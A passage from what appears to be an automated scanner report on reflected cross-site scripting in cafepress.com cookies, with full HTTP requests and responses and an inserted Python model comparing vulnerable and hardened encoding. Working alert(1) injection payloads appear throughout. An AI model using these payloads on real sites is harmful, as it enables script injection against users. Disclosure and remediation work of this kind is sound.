window.cafepress.tealeaf.utmTracking = ''
window.cafepress
...[SNIP]...

1.2. http://www.cafepress.com/ [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc0ca"-alert(1)-"bbefee824fc was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
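The two script-context reflections shown so far, the double-URL-encoded path segment in 1.1 and the cp-v cookie in 1.2, come down to the same defect: an untrusted value is dropped into a JavaScript string literal with no context-aware encoding, and in 1.1 a character blocklist is applied before a second URL-decode undoes its work. The Python below is an added example, not CafePress code and not part of the scanner report; it models both behaviours as the issue details describe them (the function names, the < and > blocklist and the post-canonicalisation validation step are assumptions) and beside each puts the hardened form: one URL-decode only, validation on the canonical value, and a JSON-based encoder for the script context. The payloads are the ones recorded in the report; the oracle at the end checks for exactly the two breakouts those payloads demonstrate.

```python
import json
import re
from urllib.parse import unquote

# Payloads copied from the report. 1.1 double-URL-encodes </script> so that the
# application's < > filter never sees a metacharacter; 1.2 closes a
# double-quoted JavaScript string with a bare quote.
PATH_PAYLOAD = ("2ebb4%253c%252fscript%253e%253cscript%253ealert%25281%2529"
                "%253c%252fscript%253edf6f6b5b741")
COOKIE_PAYLOAD = 'cc0ca"-alert(1)-"bbefee824fc'

_ANGLE_BRACKETS = re.compile(r"[<>]")


def vulnerable_landing_type(raw_path_segment: str) -> str:
    """Model of the 1.1 behaviour (assumed from the report's description): the
    web server URL-decodes the path once, the application filters < and > on
    that value, then decodes a second time and interpolates the result into a
    single-quoted JavaScript string."""
    once = unquote(raw_path_segment)             # %253c -> %3c: the filter sees no '<'
    if _ANGLE_BRACKETS.search(once):             # validation runs BEFORE the 2nd decode
        return "window.cafepress.tealeaf.pageLandingType = ''"
    twice = unquote(once)                        # custom 2nd decode: %3c -> '<'
    return ("window.cafepress.tealeaf.pageLandingType = "
            f"'/error404.aspx?404;{twice}'")


def vulnerable_evar30(cookie_value: str) -> str:
    """Model of 1.2: the cp-v cookie is copied unmodified into a double-quoted
    JavaScript string, so a single " in the cookie ends the literal."""
    return f's.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:{cookie_value}";'


def js_string_literal(value: str) -> str:
    """Encode an untrusted value as a JavaScript string literal that is safe to
    emit inside a <script> element. json.dumps escapes quotes, backslashes,
    control characters and (with ensure_ascii) U+2028/U+2029; the extra
    replacements stop </script> and <!-- from terminating the script element
    even though both are legal inside a string."""
    literal = json.dumps(value, ensure_ascii=True)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        literal = literal.replace(ch, esc)
    return literal


def decode_js_literal(literal: str) -> str:
    """The escapes above are valid JSON, so decoding proves the encoding is lossless."""
    return json.loads(literal)


def hardened_landing_type(raw_path_segment: str) -> str:
    """One decode (the web server already did it), validation on the canonical
    value, then script-context encoding on output."""
    canonical = unquote(raw_path_segment)
    if any(ord(c) < 0x20 for c in canonical):    # assumed validation rule
        raise ValueError("control character in path segment")
    return ("window.cafepress.tealeaf.pageLandingType = "
            + js_string_literal("/error404.aspx?404;" + canonical))


def hardened_evar30(cookie_value: str) -> str:
    return ("s.eVar30 = "
            + js_string_literal("A8D8655B7B25F13535D4E6E67BEC27E9:" + cookie_value)
            + ";")


def _unescaped(js: str, quote: str) -> int:
    # Count delimiters not preceded by a backslash.
    return len(re.findall(r"(?<!\\)" + re.escape(quote), js))


def script_assignment_is_intact(js: str) -> bool:
    """Crude oracle for the two breakouts in the report: the generated statement
    must not contain a literal </script>, and must contain exactly one string
    literal (two unescaped delimiters of one kind and none of the other)."""
    if "</script" in js.lower():
        return False
    dq, sq = _unescaped(js, '"'), _unescaped(js, "'")
    return (dq, sq) in ((2, 0), (0, 2))


if __name__ == "__main__":
    for label, js in (("1.1 vulnerable", vulnerable_landing_type(PATH_PAYLOAD)),
                      ("1.1 hardened", hardened_landing_type(PATH_PAYLOAD)),
                      ("1.2 vulnerable", vulnerable_evar30(COOKIE_PAYLOAD)),
                      ("1.2 hardened", hardened_evar30(COOKIE_PAYLOAD))):
        print(f"{label:15} intact={script_assignment_is_intact(js)}  {js}")
```

Running the file prints the four generated statements with the oracle's verdict. The single-encoded form x%3cscript%3e is caught by the blocklist in the vulnerable model, which is why the scanner had to double-encode; the hardened model never performs the second decode, so %253c stays the literal text %3c, and when a decoded < does arrive (as it does unmodified in the cookie case) the encoder turns it into \u003c rather than relying on a filter. The cookie reflection is reachable in practice whenever an attacker can plant a cookie for www.cafepress.com; the Set-Cookie headers above scope cookies to domain=cafepress.com, which means any host under that domain that can be made to run script can set cp-v or cp_st for the main site.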

Request

GET / HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAcc0ca"-alert(1)-"bbefee824fc; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 75201
Date: Sun, 26 Dec 2010 13:46:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 75201


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAcc0ca"-alert(1)-"bbefee824fc";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.3. http://www.cafepress.com/ [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adbea</script><script>alert(1)</script>c2b3851b0e4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=adbea</script><script>alert(1)</script>c2b3851b0e4; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 75223
Date: Sun, 26 Dec 2010 13:46:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 75223


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
n_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'HomePage'
window.cafepress.tealeaf.searchTerm = 'adbea</script><script>alert(1)</script>c2b3851b0e4'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.4. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e15e"-alert(1)-"05104e4ef1f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA1e15e"-alert(1)-"05104e4ef1f; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 93201
Date: Sun, 26 Dec 2010 13:46:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA1e15e"-alert(1)-"05104e4ef1f";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.5. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2434e</script><script>alert(1)</script>da77cba4a3a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=2434e</script><script>alert(1)</script>da77cba4a3a; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
Cteonnt-Length: 93261
Date: Sun, 26 Dec 2010 13:46:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=49f12%00%0d%0a462543dabee; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:51 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:51 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'ProductDetails'
window.cafepress.tealeaf.searchTerm = '2434e</script><script>alert(1)</script>da77cba4a3a'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.6. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5445"-alert(1)-"653f5650114 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; 